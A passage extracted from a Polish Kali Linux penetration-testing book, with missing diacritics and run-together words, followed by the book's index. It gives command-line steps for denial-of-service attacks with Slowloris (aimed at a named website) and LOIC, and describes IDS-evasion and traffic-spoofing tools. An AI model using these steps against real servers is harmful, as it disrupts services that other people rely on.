Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
